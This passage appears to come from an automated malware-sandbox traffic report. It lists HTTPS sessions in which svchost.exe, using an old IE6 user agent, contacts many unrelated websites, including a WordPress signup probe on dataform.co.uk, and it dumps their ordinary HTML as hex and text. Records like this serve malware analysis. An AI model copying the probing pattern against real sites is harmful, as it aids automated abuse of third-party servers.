                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8226INData Raw: 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65
                                                                                                                                                                                                                                                                          Data Ascii: spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrappe
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8227INData Raw: 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e
                                                                                                                                                                                                                                                                          Data Ascii: 3- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <stron
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8228INData Raw: 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e
                                                                                                                                                                                                                                                                          Data Ascii: t-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8230INData Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69
                                                                                                                                                                                                                                                                          Data Ascii: "><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Lui
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8231INData Raw: 34 62 62 0d 0a 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f
                                                                                                                                                                                                                                                                          Data Ascii: 4bb><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="po
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8232INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          88192.168.2.67568172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7495OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:49 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zgY12ENhndd%2BTDRoJzYXzX5WDlIjX2PPJhSDhv2VEark8CqE4tGfqlSuprNijOuzBzrGoj77HOzulNAIc6PjuDQFWuxzuZccq8uyrFbaJQLn7BtJk2tsuDWGBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e0ecd9d3637-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8265INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          89192.168.2.6828575.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10313OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10585INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:50 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10586INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          9192.168.2.65023283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC213OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=85
                                                                                                                                                                                                                                                                          Content-Length: 49051
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:09 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC214INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC217INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                          Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC226INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                          Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC234INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                          Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC242INData Raw: 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: o.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="32x32"/><link rel="apple-touch-icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-cont
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC250INData Raw: 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 44 61 74 61 66 6f 72 6d 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74
                                                                                                                                                                                                                                                                          Data Ascii: em-text"><span class="menu-text">Dataform</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-t
                                                                                                                                                                                                                                                                          2023-07-05 06:07:09 UTC258INData Raw: 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a
                                                                                                                                                                                                                                                                          Data Ascii: var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.j


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          90192.168.2.69032185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11947OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11947INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:51 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC11947INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          91192.168.2.61019194.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15729OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
